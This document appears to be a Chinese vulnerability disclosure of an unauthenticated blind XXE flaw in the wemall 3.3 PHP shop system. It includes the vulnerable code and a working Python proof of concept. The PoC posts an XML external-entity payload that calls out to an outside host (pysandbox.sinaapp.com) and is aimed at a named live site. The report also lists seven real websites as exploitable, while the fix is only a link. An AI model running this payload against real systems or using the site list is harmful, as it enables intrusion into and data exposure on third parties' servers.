wemall微信开源PHP商城系统一处blind xxe(无需登录,附POC)

  • A+
所属分类:漏洞时代
摘要

测试版本wemall 3.3

下载地址 http://git.oschina.net/einsqing/wemall/repository/archive?ref=master 需要开源中国的账号


漏洞作者: 1c3z

详细说明:

测试版本wemall 3.3

下载地址 http://git.oschina.net/einsqing/wemall/repository/archive?ref=master 需要开源中国的账号

//Application/Lib/Action/Admin/WechatAction.class.php  <?php  class WechatAction extends Action {   public function init() {    import ( 'wechat', APP_PATH . 'Common', '.class.php' );    $config = M ( "Wxconfig" )->where ( array (      "id" => "1"     ) )->find ();        $options = array (      'token' => $config ["token"], // 填写你设定的key      'encodingaeskey' => $config ["encodingaeskey"], // 填写加密用的EncodingAESKey      'appid' => $config ["appid"], // 填写高级调用功能的app id      'appsecret' => $config ["appsecret"], // 填写高级调用功能的密钥      );    $weObj = new Wechat ( $options );    return $weObj;   }   public function index() {    $weObj = $this->init ();    $weObj->valid ();

可以看到index函数中

$weObj为Wechat类的实例化

而Wechat类从import ( 'wechat', APP_PATH . 'Common', '.class.php' );导入的

也就是Application/Common/wechat.class.php

重点关注valid()函数

public function valid($return=false)      {          $encryptStr="";          if ($_SERVER['REQUEST_METHOD'] == "POST") {              $postStr = file_get_contents("php://input");              $array = (array)simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

直接使用了simplexml_load_string函数

如何调用代码呢?

访问index.php?g=Admin&m=Wechat&a=index

如何利用参考: http://wooyun.org/bugs/wooyun-2010-098591

下面是poc代码:

#!/usr/bin/python    import urllib2  import random    import socket  socket.setdefaulttimeout(10)  def send_xml(url,data):      import requests      try:          requests.post(url,data)      except Exception, e:          print e    def poc(host):      url = 'http://' + host + '/index.php?g=Admin&m=Wechat&a=index'      key = "".join(random.sample('abcdefghijklmnopqrstuvwxyz', 6))      value = "".join(random.sample('abcdefghijklmnopqrstuvwxyz', 6))      data = """<?xml version="1.0" encoding="UTF-8"?>  <!DOCTYPE root [  <!ENTITY % remote SYSTEM "http://pysandbox.sinaapp.com/kv?act=set&k={key}&v={value}">  %remote;]>  <root/>"""      data = data.replace('{key}', key).replace('{value}', value)        send_xml(url, data)        url = 'http://pysandbox.sinaapp.com/kv?act=get&k=' + key      res = urllib2.urlopen(url).read()        if value in res:          print "xxe"    poc('www.mybuy.so')

 

访问http://pysandbox.sinaapp.com/kv?act=set&k={key}&v={value} 可以在远程主机设置一个键值对

http://pysandbox.sinaapp.com/kv?act=get&k=刚刚的key 可以查看是否设置了这个键值对

商业版本也应该可以xxe

http://demo.inuoer.com/1/Admin/Wechat/index.html

但是demo有防火墙

漏洞证明:

下面是存在xxe的

http://www.dadodo.wang/index.php?g=Admin&m=Wechat&a=index

http://www.jxbar.com/index.php?g=Admin&m=Wechat&a=index

http://www.liushengjie.com/index.php?g=Admin&m=Wechat&a=index

http://www.wifi-xj.com/index.php?g=Admin&m=Wechat&a=index

http://www.tjguguai.net/index.php?g=Admin&m=Wechat&a=index

http://www.mallonline.com.cn/index.php?g=Admin&m=Wechat&a=index

http://www.mybuy.so/index.php?g=Admin&m=Wechat&a=index

修复方案:

http://wiki.wooyun.org/web:xxe-attack

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: